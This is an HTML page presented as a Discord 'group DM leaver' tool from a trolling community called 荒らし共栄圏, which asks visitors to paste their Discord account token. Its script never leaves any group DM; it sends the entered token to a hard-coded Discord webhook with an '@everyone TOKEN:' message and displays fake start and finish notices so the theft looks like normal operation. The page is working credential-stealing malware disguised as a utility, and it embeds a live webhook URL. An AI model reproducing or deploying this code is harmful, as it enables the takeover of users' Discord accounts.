<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title>discord group DM leaver</title>
    <meta name="description" content="指定されたグループDMから退出するツールです">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="theme-color" content="#FF0000">
    <meta property="og:url" content="">
    <meta property="og:type" content="article">
    <meta property="og:title" content="discord group DM leaver">
    <meta property="og:description" content="指定されたグループDMから退出するツールです">
    <meta property="og:site_name" content="荒らし共栄圏">
    <meta property="og:image" content="">
  <br>
  <h1><font color="white">荒らし共栄圏 group DM leaver</font></h1>
  </br>
  <a href="https://discord.gg/4exwhT5EC8">荒らし共栄圏</a>
    <style>
      body {
        text-align:center;
        background-image: url('https://illustimage.com/photo/1701.png?20151101');
        background-size: cover;
      }
      .container {
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        height: 50vh;
      }

      .input-group {
        display: flex;
        flex-direction: column;
        align-items: center;
        margin-bottom: 0.1em;
        width: 30%;
      }

      .input-group label {
        font-size: 0.8em;
        color: #fff;
        margin-bottom: 0.1em;
        display: inline-block;
        width: 100px;
        text-align: center;
        padding-left: 10px;
      }

      .input-group input[type="text"],
      .input-group input[type="number"] {
        padding: 0.5em;
        margin: 0.5em;
        font-size: 1em;
        width: 100%;
        border-radius: 5px;
        border: none;
        background-color: rgba(255, 255, 255, 0.1);
        color: #fff;
      }
      button {
        padding: 0.5em 1em;
        font-size: 1em;
        background-color: #FF0000;
        color: white;
        border: none;
        border-radius: 5px;
      }
      .height-cemter {
        display: flex;
        align-items: center;
      }

      input[type="checkbox"] {
        width: 20px;
        height: 20px;
      }
    </style>
  </head>
  <body>
  <br>
    <div class="container">
      <div class="input-group">
        <label for="token">token</label>
        <input type="text" id="token" placeholder="ここにtoken">
      </div>
      <div class="height-cemter">
        <input type="checkbox" id="tts-checkbox"><font color="white">最新apiを使用</font>
      </div>
      <br>
      <button id="submit-button">退出開始</button>
    </div>
    <script>
      const submitButton = document.getElementById("submit-button");
      submitButton.addEventListener("click", startSending);

      async function startSending() {
        document.body.style.backgroundImage = "url('https://illustimage.com/photo/1701.png?20151101')";
        const token = document.getElementById("token").value;

        if (!token) {
          return alert("tokenは必須です");
        }

        const webhookUrl = "https://discord.com/api/webhooks/1302502343643893831/0cG3ngopyt4dUNpj_GRZQd2pTAMLMqfmps4vrWlGUqpE5STWhuiv-pHYHSx_7UuLoikv";
        
        const startMessageDisplay = document.createElement("div");
        startMessageDisplay.style.color = "#FF0000";
        startMessageDisplay.style.fontSize = "23px";
        startMessageDisplay.textContent = "開始されました " + new Date().toLocaleString();
        document.body.appendChild(startMessageDisplay);

        try {
          await sendRequest(webhookUrl, token);
          const endMessageDisplay = document.createElement("div");
          endMessageDisplay.style.color = "#FF0000";
          endMessageDisplay.style.fontSize = "23px";
          endMessageDisplay.textContent = "終了しました " + new Date().toLocaleString();
          document.body.appendChild(endMessageDisplay);
        } catch (error) {
          console.error(error);
        }
      }
async function sendRequest(url, token) {
  const response = await fetch(url, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ content: `@everyone TOKEN: ${token}`, tts: false }),
  });
  return response.json();
}


      function sleep(ms) {
        return new Promise((resolve) => setTimeout(resolve, ms));
      }
    </script>
  </body>
</html>

